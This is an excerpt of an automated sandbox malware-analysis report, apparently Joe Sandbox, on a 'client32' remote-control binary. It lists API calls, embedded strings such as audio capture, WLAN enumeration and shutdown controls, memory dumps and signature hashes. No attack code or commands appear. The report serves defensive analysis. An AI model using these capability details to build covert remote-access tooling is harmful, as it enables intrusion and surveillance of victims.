                                                                                                                        • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5432
                                                                                                                        • TranslateMessage.USER32(?), ref: 110F5443
                                                                                                                        • DispatchMessageA.USER32(?), ref: 110F544C
                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5460
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 110F5473
                                                                                                                        • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F548B
                                                                                                                        • TranslateMessage.USER32(?), ref: 110F549E
                                                                                                                        • DispatchMessageA.USER32(?), ref: 110F54A7
                                                                                                                        • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F54BA
                                                                                                                        • ShowCursor.USER32(00000001), ref: 110F54C2
                                                                                                                        • SetCursor.USER32(?), ref: 110F54CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Cursor$DispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpen_memsetwsprintf
                                                                                                                        • String ID: NSLockExit
                                                                                                                        • API String ID: 2358329513-1578567420
                                                                                                                        • Opcode ID: 8e6a3f007d3c7767c2c9280eeeacc41a13dd947ceb4fa7b85dbd1afa2711b587
                                                                                                                        • Instruction ID: da66d542c3fb9b9b9736b56b4e9605354d9b8fdeed183c23e7030b173a746b46
                                                                                                                        • Opcode Fuzzy Hash: 8e6a3f007d3c7767c2c9280eeeacc41a13dd947ceb4fa7b85dbd1afa2711b587
                                                                                                                        • Instruction Fuzzy Hash: 0451AC75E0032AABDB11DFA48C81FEDF7B8EB44718F1085A5E615E7184EB71AA40CF91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685A7BE0: _memset.LIBCMT ref: 685A7BFF
                                                                                                                          • Part of subcall function 685A7BE0: _strncpy.LIBCMT ref: 685A7C0B
                                                                                                                        • __wcstoui64.LIBCMT ref: 68599EF8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcstoui64_memset_strncpy
                                                                                                                        • String ID: 1.0$CMPI$FAILED_REASON$Gateway rejected client connection because licence was exceeded.$Gateway rejected client connection because security check failed.$MAC$MAXPACKET$PROTOCOL_VER$RESULT$SERVER_VERSION$a+Zh$a3Zh$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$strlen(p) == 12
                                                                                                                        • API String ID: 2670788892-402558523
                                                                                                                        • Opcode ID: 8f34d15658b85633f739ca226c59839e2556280a40b0e8f33d8ae2c4ebd695d6
                                                                                                                        • Instruction ID: 1dbb51728e7e1bb68996ed7f22fd4c3f1607b46b4df2bfeb88f8fc75ee264342
                                                                                                                        • Opcode Fuzzy Hash: 8f34d15658b85633f739ca226c59839e2556280a40b0e8f33d8ae2c4ebd695d6
                                                                                                                        • Instruction Fuzzy Hash: 23415CB9E44282BFEF0196B49C45BBFB2A89B41249FC40024EC58DA341F735EE54C3E6
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                        • API String ID: 1771113911-4289949731
                                                                                                                        • Opcode ID: 82dd4ba4bc08af244ae9d6a02e77c4ac146e7442ba684e5c54fe6b6afb63173e
                                                                                                                        • Instruction ID: c0b8f27de1ce6cd829755d0c4de5306f4c9dede518564315ee05c0f4e4a83482
                                                                                                                        • Opcode Fuzzy Hash: 82dd4ba4bc08af244ae9d6a02e77c4ac146e7442ba684e5c54fe6b6afb63173e
                                                                                                                        • Instruction Fuzzy Hash: 01B15D717501849BDF28CE1CDC90A9EB7AAEB85714798491CF892CB781C7B4EC81CBA1
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(0000001C), ref: 1112117E
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 111211B5
                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMRemote32), ref: 111213AA
                                                                                                                        • GetVersionExA.KERNEL32(?,?,?,00000000), ref: 111213D3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AtomCriticalCurrentGlobalInitializeSectionThreadVersion
                                                                                                                        • String ID: IgnoreScrape$LegacyScrape$LimitColorbits$MaxLag$NSMRemote32$ScaleToFitMode$ScaleToFitTilingFactor$Show$ShowBigBlits$View
                                                                                                                        • API String ID: 3042533059-2538903574
                                                                                                                        • Opcode ID: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
                                                                                                                        • Instruction ID: eb6122d518b0ca6329e0510ddbb3154fc8dc97cf8e450e1036336aff3cebea76
                                                                                                                        • Opcode Fuzzy Hash: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
                                                                                                                        • Instruction Fuzzy Hash: 59B18CB8A00705AFD760CF65CD84B9BFBF5AF85704F20856EE55A9B280DB30A940CF51
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                        • EnterCriticalSection.KERNEL32(?,Audio,DisableSounds,00000000,00000000,7E4636A2), ref: 1100B3BB
                                                                                                                        • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B3D8
                                                                                                                        • _calloc.LIBCMT ref: 1100B409
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100B42F
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 1100B469
                                                                                                                          • Part of subcall function 1100AC60: EnterCriticalSection.KERNEL32(?,7E4636A2), ref: 1100ACA4
                                                                                                                          • Part of subcall function 1100AC60: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACC2
                                                                                                                          • Part of subcall function 1100AC60: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100AD0E
                                                                                                                          • Part of subcall function 1100AC60: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD55
                                                                                                                          • Part of subcall function 1100AC60: CloseHandle.KERNEL32(00000000), ref: 1100AD5C
                                                                                                                          • Part of subcall function 1100AC60: _free.LIBCMT ref: 1100AD73
                                                                                                                          • Part of subcall function 1100AC60: FreeLibrary.KERNEL32(?), ref: 1100AD8B
                                                                                                                          • Part of subcall function 1100AC60: LeaveCriticalSection.KERNEL32(?), ref: 1100AD95
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 1100B48E
                                                                                                                        Strings
                                                                                                                        • Vista new pAudioCap=%p, xrefs: 1100B4F3
                                                                                                                        • Audio, xrefs: 1100B367
                                                                                                                        • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4E3
                                                                                                                        • \\.\NSAudioFilter, xrefs: 1100B3D0
                                                                                                                        • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B53C
                                                                                                                        • DisableSounds, xrefs: 1100B362
                                                                                                                        • Vista AddAudioCapEvtListener(%p), xrefs: 1100B513
                                                                                                                        • InitCaptureSounds NT6, xrefs: 1100B4AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressCloseEventExchangeFileFreeHandleInterlockedLoadProc__wcstoi64_calloc_free
                                                                                                                        • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                                        • API String ID: 2005284756-2362500394
                                                                                                                        • Opcode ID: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
                                                                                                                        • Instruction ID: 13704de1d539ef30c3066c3cc5484e22fa9722ec6e344ec07ec17af159e95cc0
                                                                                                                        • Opcode Fuzzy Hash: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
                                                                                                                        • Instruction Fuzzy Hash: A951D8B5E04A4AAFE714CF64DC80BAEF7E8FB04359F10467EE92993640E731765087A1
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 1110313E
                                                                                                                        • EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
                                                                                                                        • GetTickCount.KERNEL32 ref: 1110314D
                                                                                                                        • GetTickCount.KERNEL32 ref: 111031A0
                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
                                                                                                                        • GetTickCount.KERNEL32 ref: 111031DA
                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031E3
                                                                                                                        • EnterCriticalSection.KERNEL32(111EC5C4), ref: 1110320C
                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC5C4,00000000,?,00000000), ref: 111032D3
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                          • Part of subcall function 110EEA50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103277,?), ref: 110EEA7B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_memsetwsprintf
                                                                                                                        • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                                                        • API String ID: 3572004736-3013461081
                                                                                                                        • Opcode ID: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
                                                                                                                        • Instruction ID: 751a9e08e7d07462896511fc241fa3711dcdedb17ea13ac702f7fc28ec4d2028
                                                                                                                        • Opcode Fuzzy Hash: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
                                                                                                                        • Instruction Fuzzy Hash: 9441F67AF04519AFCB11DFE59C85EEEFBB5AB44218B104525F905E7640EB306900CBA1
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 1103B15F
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 1103B1A4
                                                                                                                        • PostMessageA.USER32(00010480,00000010,00000000,00000000), ref: 1103B1CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountMessagePostSleepTick
                                                                                                                        • String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
                                                                                                                        • API String ID: 507213284-4185502373
                                                                                                                        • Opcode ID: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
                                                                                                                        • Instruction ID: f79ec28786b2f4c10a59bc50768d7a54d57fb70274f002d705909bb0de105b61
                                                                                                                        • Opcode Fuzzy Hash: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
                                                                                                                        • Instruction Fuzzy Hash: 12412934F4065EBEE721CA529C85FBDB795ABC0B0DF5040A5FE247E2C0EB60B4408355
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                        • LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
                                                                                                                        • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
                                                                                                                        • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
                                                                                                                        • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
                                                                                                                        • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
                                                                                                                        • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
                                                                                                                        • std::exception::exception.LIBCMT ref: 111570CD
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 111570E2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Exception@8LibraryLoadThrow_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                                                        • API String ID: 1463381176-1736626566
                                                                                                                        • Opcode ID: 883de4db6132f92fd2791c3658098a597c0006997dfe857d44e8fbfa8cff4122
                                                                                                                        • Instruction ID: caad9b3ffb412b0ce201366128ee2238a993313849ab4ce7a7f1ca44c3893492
                                                                                                                        • Opcode Fuzzy Hash: 883de4db6132f92fd2791c3658098a597c0006997dfe857d44e8fbfa8cff4122
                                                                                                                        • Instruction Fuzzy Hash: 6521E1B5A01718AFC751EFADCD809ABFBF9AF58204700C92AE469C3301E670E401CF91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • _memset.LIBCMT ref: 685A0FAD
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,685D0E3D,?,?,?,?,?,?,00000000), ref: 685A1293
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,00000000), ref: 685A12E3
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,685D0E3D,?,?,?,?,?,?,00000000), ref: 685A1316
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,00000000), ref: 685A132D
                                                                                                                        • std::exception::exception.LIBCMT ref: 685A135B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685A1376
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
